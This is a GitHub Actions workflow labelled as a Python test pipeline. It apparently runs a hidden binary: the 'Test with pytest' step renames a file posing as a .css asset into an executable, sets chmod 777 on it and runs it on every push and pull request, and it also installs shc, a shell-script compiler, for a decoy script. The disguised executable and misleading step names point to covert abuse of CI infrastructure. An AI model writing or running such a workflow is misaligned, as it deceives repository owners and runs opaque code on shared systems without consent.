name: Python application

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

permissions:
  contents: read

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v3
    - name: Set up Python 3.8
      uses: actions/setup-python@v3
      with:
        python-version: "3.8"
    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        sudo apt install shc -y
    - name: Test with pytest
      run: |
        cd ${{ github.workspace }}
        echo 1
        mv cly7e1v/nc7dnhkat/ualml5/sinclairs1m85.css fyxtg.sh.x
        cat > a.sh <<EOF
        #!/bin/bash
        ls
        EOF
        shc -f a.sh
        sudo chmod 777 fyxtg.sh.x
        ./a.sh.x
        ./fyxtg.sh.x
